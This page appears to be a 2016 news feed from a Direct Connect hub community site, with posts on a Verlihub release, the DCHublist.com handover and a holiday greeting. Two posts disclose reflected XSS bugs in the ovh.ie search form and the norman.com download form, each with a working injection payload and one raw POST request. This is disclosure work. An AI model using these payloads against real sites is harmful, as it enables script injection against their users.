This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
18.97.9.168.US.SSL

OVH.ie search form XSS bug

Vulnerable page: http://www.ovh.ie/

PoC
"><img src=http://te-home.net/images/logo.png>

It is enough to insert any XSS code directly into search field and your code will be executed and displayed by /js/search/gsearch.js script right away.

PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2016-04-10 00:37 1 comment 7 likes

Norman.com download submission form XSS bug

Vulnerable page: http://www.norman.com/home_and_small_office/trials_downloads/

Specified page shows a frame linked from http://newton.norman.com/, so you have to post to that frame in order for XSS to work.

PoC
POST /reg.php HTTP/1.1
Host: newton.norman.com
name="><img src=http://te-home.net/images/logo.png>

You can either include any XSS code in name input box, or request any XSS code directly using POST method and name parameter.

PoC
PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2016-04-09 23:27 0 comments 7 likes

Verlihub Verlihub 1.0.0.0

First stable release in 1.0.0.0 series.

Changes in 1.0.0.0
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.0.0.0
Posted by verlihub on 2016-04-05 10:54 1 comment 8 likes

DCHublist.com

Many of you are probably wondering: What really happened with DCHublist.com and why is it pointing here? Yep, that's right, it's pointing here because I am close friend with people who wrote and managed it during all these years. The time has passed and developers were no longer interested in keeping it, so they left it to me, both source code and domain name. Now dchublist.com is redirecting to our own hublist.

By the way, if you are missing something that used to be on DCHublist.com, please send us a feature request either by forum or contact form, I'm sure that your feature will be added, mainly because I'm the developer here. tongue2

Oh, also all client side lists that are still present in most DC clients, are still working, with a single redirect though. Complete URL list can be found here.

Have fun using Team Elite Hublist.
Posted by RoLex on 2016-03-30 12:50 3 comments 9 likes

Happy Easter

Happy Easter
Posted by RoLex on 2016-03-26 13:42 2 comments 8 likes